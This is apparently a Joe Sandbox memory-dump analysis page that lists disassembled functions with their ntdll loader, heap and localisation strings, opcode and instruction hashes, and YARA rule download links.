                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          • Opcode ID: 2e1210c902433f20b27177856efe0a9cb74983e183502903f460115002442358
                                          • Instruction ID: f701335378a2e8c553ba669d8e97db6e29dcfccce4494666f5188b7207edc1ef
                                          • Opcode Fuzzy Hash: 2e1210c902433f20b27177856efe0a9cb74983e183502903f460115002442358
                                          • Instruction Fuzzy Hash: 2A92AD71A042499FDB15CF68C440BAEBBF1FF49310F1480AEE959AB391D73AA945CF90
                                          Function 21B8A118 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 591timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: @
                                          • API String ID: 3446177414-2766056989
                                          • Opcode ID: 7eae54be952fc6330b5fec14c4f6547a505b55ea1dd8f3a3147159eb654d4be9
                                          • Instruction ID: 6286d4efb8efaeaebd5c74eb3f4d606e3e8f785a620567b9de6f146bd15a6633
                                          • Opcode Fuzzy Hash: 7eae54be952fc6330b5fec14c4f6547a505b55ea1dd8f3a3147159eb654d4be9
                                          • Instruction Fuzzy Hash: 3422F0742046A18BEB19CF39C090772BBF1EF47B44F06855DE9868F296E335E582DB60
                                          Function 21B06962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $@
                                          • API String ID: 0-1077428164
                                          • Opcode ID: b06f9b34c113629c532cad7177541622d947e43b65a6a7f8a2c681133878179b
                                          • Instruction ID: 6bc46e0d17ec01bd36604c1ec0dda559117574f742f0eb72fb7e8ab470e63a08
                                          • Opcode Fuzzy Hash: b06f9b34c113629c532cad7177541622d947e43b65a6a7f8a2c681133878179b
                                          • Instruction Fuzzy Hash: 7CC27D71A083859FE729CF24C890B9BBBF5EF89744F04892DE9C987251D734D905CBA2
                                          Function 21ADA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: 67a29dbc294cac9ed322032159c9373fb2eb101d7ba9c0de1a3c5a9081364bc1
                                          • Instruction ID: 8dc2480327b32acd80d99a148c7ba0642115081eeac4909f3ac40ff219c075e1
                                          • Opcode Fuzzy Hash: 67a29dbc294cac9ed322032159c9373fb2eb101d7ba9c0de1a3c5a9081364bc1
                                          • Instruction Fuzzy Hash: 9DA157729016299BDB25DF64CC88BAAB7B8FF49711F1001EAE909A7260D7359FC4CF50
                                          Function 21B9C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 21B9C1F1
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 21B9C1C5
                                          • PreferredUILanguages, xrefs: 21B9C212
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          • Opcode ID: e9a3f5a1780ef705ba32f72c9467c9172e72aecd319cd0e4ef0dbf0139732372
                                          • Instruction ID: ee8134b0eb327e654f04eaedc470d3f5f666262a5d469d3c3f308c88f9ba3602
                                          • Opcode Fuzzy Hash: e9a3f5a1780ef705ba32f72c9467c9172e72aecd319cd0e4ef0dbf0139732372
                                          • Instruction Fuzzy Hash: EA414F72E0020DEFDF15CFD4C891BEEBBB8EB15701F1041BAE609A7250D7749A458B50
                                          Function 21B74144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          • Opcode ID: ce672811bfd790ff3eda290138b3afc023ed78243c0a7ac2779d26ed697f0bea
                                          • Instruction ID: 42c2f6202c1efef4b9181d183777a7441465f85e2d482f80b1aab4105661287e
                                          • Opcode Fuzzy Hash: ce672811bfd790ff3eda290138b3afc023ed78243c0a7ac2779d26ed697f0bea
                                          • Instruction Fuzzy Hash: 66412532E046898FEB1ADBE5D940BADBBB8FF56340F10056DD920EB7A1D7358902CB10
                                          Function 21AF0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          • Opcode ID: 62595c6a7f36ed6083fa1ee0c71772534a5e44ef45404c89cd63741979123da7
                                          • Instruction ID: ab92d04cca03eb3e8e9668178d57ec67f1693f8499808c66c4f6e72e26ceaf04
                                          • Opcode Fuzzy Hash: 62595c6a7f36ed6083fa1ee0c71772534a5e44ef45404c89cd63741979123da7
                                          • Instruction Fuzzy Hash: BF11AC317168869FD61DCA24C5A1F6AB3BAEF62716F14815AF405CF265DB34E840C750
                                          Function 21B620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                          Download Yara Rule
                                          Strings
                                          • Process initialization failed with status 0x%08lx, xrefs: 21B620F3
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B62104
                                          • LdrpInitializationFailure, xrefs: 21B620FA
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          • Opcode ID: 51fec0792f070d1b878a797941991aeaa68e55b8af4f3e9a3cc8cf42a11aee72
                                          • Instruction ID: 05919361b4edfe067b000f6ea0fd7e89a256f4495d2feb745f7db2f8e9e41c28
                                          • Opcode Fuzzy Hash: 51fec0792f070d1b878a797941991aeaa68e55b8af4f3e9a3cc8cf42a11aee72
                                          • Instruction Fuzzy Hash: E3F0FC75A40248BFFB18DB49CC92F9637BCFB55B54F510059F60477291D2B0A900CB91
                                          Function 21AF03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          • Opcode ID: 20b66b42453104e9bde6a5eadd35199d29f4534957efb30b69c4cd9b99e21e3d
                                          • Instruction ID: 85cfe4c7ebe260ea2055d372884ca954e991a23e055871beec853ffbb92e8270
                                          • Opcode Fuzzy Hash: 20b66b42453104e9bde6a5eadd35199d29f4534957efb30b69c4cd9b99e21e3d
                                          • Instruction Fuzzy Hash: B1714B71A0014A9FDB05CFA8C991FAEB7F8FF18704F144069E905E7252EA39EE15CB60
                                          Function 21B6892A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 21B6895E
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          • Opcode ID: 7e66d5aa78ad27fb4eed67fc71fb8d9bf8823e11af7967c53d6a9c61c85a0539
                                          • Instruction ID: df5cd5d1fb62b522d879d05793f471ed459e8b6a94c5b1e31fec3d0b96db8cfc
                                          • Opcode Fuzzy Hash: 7e66d5aa78ad27fb4eed67fc71fb8d9bf8823e11af7967c53d6a9c61c85a0539
                                          • Instruction Fuzzy Hash: 6C01F732200386AFEE2DCE52C9C4A567B7DEFBA390B04243CF641071A5CB206844CB92
                                          Function 21AEA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrResSearchResource Exit, xrefs: 21AEAA25
                                          • LdrResSearchResource Enter, xrefs: 21AEAA13
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                          • API String ID: 0-4066393604
                                          • Opcode ID: 749c6a1bb2e501ee3739c1ee9f0a32b07ae2818d4b6efa33c218a14552a2a085
                                          • Instruction ID: 4062caa1d982ebfc0d3561ee8dd633ba80f950ca0672f4ae68aa458cb299e251
                                          • Opcode Fuzzy Hash: 749c6a1bb2e501ee3739c1ee9f0a32b07ae2818d4b6efa33c218a14552a2a085
                                          • Instruction Fuzzy Hash: 38E1CD71E00219AFEF16CF99D994B9EBBB9FF19300F14857AE906E7261D7348940DB10
                                          Function 21BAA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction ID: c34f7d323080c7a667bafd9733b88e6b1b8ef51020be5df2b771fe0973508e8f
                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction Fuzzy Hash: 1AC1AE312083429FEB19CF28C841B6BBBF5EFCA754F044A2DF6958A2A0D775D505CBA1
                                          Function 21B5E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 48fe4cce6271d8ae5fc47fa8778f6ea9832b9f4ed1f40a907539a1ee99c5b5d8
                                          • Instruction ID: 6f5356c500e4da25edd171cbc60ead6cb4f04525e26acff42ee7cf129a9ede9e
                                          • Opcode Fuzzy Hash: 48fe4cce6271d8ae5fc47fa8778f6ea9832b9f4ed1f40a907539a1ee99c5b5d8
                                          • Instruction Fuzzy Hash: 69617E75E00659AFEB59CFA8C980BAEFBF9FB48740F20406DE659EB251D7319900CB50
                                          Function 21B843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$MUI
                                          • API String ID: 0-17815947
                                          • Opcode ID: ec76b79db101eea6e2ca42c2f909079670826770b03b0f4611bc7b82746551d9
                                          • Instruction ID: 7b0ccc83d535ff30dd078f3804af3e5e231c98d93620ad490e492e9231e5cb57
                                          • Opcode Fuzzy Hash: ec76b79db101eea6e2ca42c2f909079670826770b03b0f4611bc7b82746551d9
                                          • Instruction Fuzzy Hash: 70513771E0061EAFDF05CFA5CD90FEEBBB8EB58B54F110529E615B7290D6309A05CB60
                                          Function 21AEA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 21AEA2FB
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 21AEA309
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          • Opcode ID: cb3b50a075aeed4783a20b9d1fa422c47463ce684383eedface770e122daf00e
                                          • Instruction ID: befd7c9812725c52743652d4d1b8efcc749cc8526e13cee8de450c26206b3de4
                                          • Opcode Fuzzy Hash: cb3b50a075aeed4783a20b9d1fa422c47463ce684383eedface770e122daf00e
                                          • Instruction Fuzzy Hash: 3A41DF34E00646DFDB05CF59D854B5E7BB8FF96300F1480A9E919DB2A1E3B5CA00DB50
                                          Function 21B1A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          • Opcode ID: 690eea78ee17356b621e669160b067da7e8bf8501c06e041a9831d8bcfdc7c1e
                                          • Instruction ID: 8833bea0f9c5e16a64c0636e80db4db16aba7b2a4e259cc8bd8a66785ad82de2
                                          • Opcode Fuzzy Hash: 690eea78ee17356b621e669160b067da7e8bf8501c06e041a9831d8bcfdc7c1e
                                          • Instruction Fuzzy Hash: 8C01DCB2144680AFE311CF24CD45F1677F8EB96725F028939F658C7194E334E904CB96
                                          Function 21AEC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: 891a299914b18f6caf46a9afa00a9d38ddb8600a4a90b3dd71efb8dc1e37381f
                                          • Instruction ID: 06663b325ce2f663301104b8f7c047b1b4a1b7d3ce73bcf1a7940b0a626b5fd6
                                          • Opcode Fuzzy Hash: 891a299914b18f6caf46a9afa00a9d38ddb8600a4a90b3dd71efb8dc1e37381f
                                          • Instruction Fuzzy Hash: 37829A71E002198FEB26CFA8C988BEDBBB5BF49350F148179E91DAB295D7319D41CB40
                                          Function 21AE65D0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a27eb739d611ddf5fd3a5e7ada29475839b38d6f52e2657d9dd539771262b4d8
                                          • Instruction ID: 39cb732a6b4e7811597c085a8b4a896a34adf0da3cf7da7a6b4d83e9001055d3
                                          • Opcode Fuzzy Hash: a27eb739d611ddf5fd3a5e7ada29475839b38d6f52e2657d9dd539771262b4d8
                                          • Instruction Fuzzy Hash: 69E15A71608342CFC705CF28C594A5ABBE0FF89314F058A6DE99D97352EB31E905CB92
                                          Function 21B0E5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f72e0a14f5949391861d14020632eb099d8c0e2545a65d1a82d3cd520fa874e8
                                          • Instruction ID: c83d3dfc8aa6f4dd3196d16bd28d6195f300df695f28e94c77e3940647d1c866
                                          • Opcode Fuzzy Hash: f72e0a14f5949391861d14020632eb099d8c0e2545a65d1a82d3cd520fa874e8
                                          • Instruction Fuzzy Hash: F5A13731E00655AFEB19CB68C958F9EBFB4EF06750F114269EA10AB2A1C7789D40CBD1
                                          Function 21B0EBFC Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83c8585adde90465dc1647fb3ae58ab876d58a6c089cee8bdf5fd3ff475af937
                                          • Instruction ID: 05759595a93a2a9cffbbfff5b2bf1c9c154a55084c52c99b848cd3544a205cc0
                                          • Opcode Fuzzy Hash: 83c8585adde90465dc1647fb3ae58ab876d58a6c089cee8bdf5fd3ff475af937
                                          • Instruction Fuzzy Hash: B541B1756143029FD729CF28C884A5BBBF9FF88314F10492EE596C7621DB36E844CB91
                                          Function 21AE262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 48c2eb4ba574b6ba7ee8de579a17f2b94ae7d091890047857bbc80fb8601ef13
                                          • Instruction ID: cea3fbb25a4daea10434282c1ac83b701f5af55eb922943f60848102bdabf6f9
                                          • Opcode Fuzzy Hash: 48c2eb4ba574b6ba7ee8de579a17f2b94ae7d091890047857bbc80fb8601ef13
                                          • Instruction Fuzzy Hash: A141C1B1A41705CFC71ADF28C948B49B7B5FF99310F1486BBC4199B2A1DB309A41CF91
                                          Function 21B607C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 5dfa3adc69828a206ca91eef93ce23115c396d9e7ecfd72d57a868a9acce6ac2
                                          • Instruction ID: 9f5b2748dcadedf59e3cd8f2d6b0017a3fe2fe8e0d04a1bbc3f8238a047f0675
                                          • Opcode Fuzzy Hash: 5dfa3adc69828a206ca91eef93ce23115c396d9e7ecfd72d57a868a9acce6ac2
                                          • Instruction Fuzzy Hash: C6416A725083459FD724CF29C844B9BBBF8FF98764F004A2EF99887250D7349904CB92
                                          Function 21AE4859 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
